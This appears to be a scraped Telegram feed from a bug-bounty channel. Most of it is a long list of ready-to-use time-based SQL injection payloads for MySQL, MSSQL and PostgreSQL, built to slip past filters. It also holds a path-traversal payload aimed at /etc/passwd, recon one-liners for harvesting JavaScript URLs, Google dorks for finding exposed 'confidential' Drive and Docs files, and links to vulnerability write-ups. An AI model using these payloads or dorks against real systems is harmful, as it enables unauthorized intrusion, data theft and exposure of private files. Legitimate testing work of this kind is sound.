echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \
| httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \
| jq -r '.extracts[]' | tr -d '[],'
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
⚡Ultimate FFUF Cheat Sheet!
🔗https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150
🔗
👍2
Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{
../../../../../../e*c/p*s*d{{
Please open Telegram to view this post
VIEW IN TELEGRAM
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
👍1
curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'
Please open Telegram to view this post
VIEW IN TELEGRAM
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docx
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
If you hate wasting time with 2FA, try this:
1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.
Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast!
Credit- sw33tLie
1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.
Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast!
Credit- sw33tLie
From Broken Access Control to First Bounty: https://infosecwriteups.com/from-broken-access-control-to-first-bounty-01712b1dab53?source=rss------bug_bounty-5
Medium
From Broken Access Control to First Resolved Bug
In the Name of Allah, the Most Beneficent, the Most Merciful. All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind…
Bug Critical Flaw: Default Password to Super Admin!: https://medium.com/@firdansp/bug-critical-flaw-default-password-to-super-admin-ef20c4214231?source=rss------bug_bounty-5
Medium
🚨Bug Critical Flaw: Default Password to Super Admin!
Hello everyone,
👍2
API Pentesting: Broken Object Property Level Authorization: https://devilwrites.medium.com/api-pentesting-broken-object-property-level-authorization-21d65939ad24?source=rss------bug_bounty-5
Medium
API Pentesting: Broken Object Property Level Authorization
Basics of Broken Object Property Level Authorization
👍1
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities: https://thexssrat.medium.com/the-ultimate-checklist-for-detecting-idor-and-broken-access-control-vulnerabilities-b1585dd4e999?source=rss------bug_bounty-5
Medium
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities
When testing web applications for security vulnerabilities, Insecure Direct Object References (IDOR) and Broken Access Control (BAC) are…
👍1
Cross-Site Scripting (XSS): Techniques, Bypasses, and Detection: https://medium.com/@rootast/cross-site-scripting-xss-techniques-bypasses-and-detection-927af5a55d02?source=rss------bug_bounty-5
Medium
Cross-Site Scripting (XSS): Techniques, Bypasses, and Detection
Test All Input Fields:
- Start by testing every input field on the website. Check if the data you input is reflected back unsanitized in…
- Start by testing every input field on the website. Check if the data you input is reflected back unsanitized in…
👍1
Traditional Pentest vs. Bug Bounty Program: The Pros, The Cons, and How to Do It Right: https://medium.com/@hackrate/traditional-pentest-vs-bug-bounty-program-the-pros-the-cons-and-how-to-do-it-right-f2d8beff40bf?source=rss------bug_bounty-5
Medium
Traditional Pentest vs. Bug Bounty Program: The Pros, The Cons, and How to Do It Right
In the ever-evolving landscape of cybersecurity, businesses must stay one step ahead of potential threats to protect their assets, users…